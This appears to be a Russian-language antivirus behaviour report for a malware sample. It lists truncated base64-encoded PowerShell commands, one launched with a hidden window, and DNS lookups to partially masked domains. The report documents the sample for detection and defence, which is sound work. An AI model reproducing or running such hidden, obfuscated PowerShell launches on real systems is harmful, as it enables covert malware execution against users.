Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADcAOABjADIAOQA3ADcAYwB4ADMAMAA9ACcAeAA4ADIAMAAwADQANAA1ADQANwAxADEANwAnADsAJABjADkAOQAwAGMAOQA...
- DNS ASK er###nlaw.com
- DNS ASK ca####plussatna.com
- DNS ASK ra###hzawar.com
- DNS ASK pl####lancer.com
- DNS ASK pr##opro.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADcAOABjADIAOQA3ADcAYwB4ADMAMAA9ACcAeAA4ADIAMAAwADQANAA1ADQANwAxADEANwAnADsAJABjADkAOQAwAGMAOQA...' (со скрытым окном)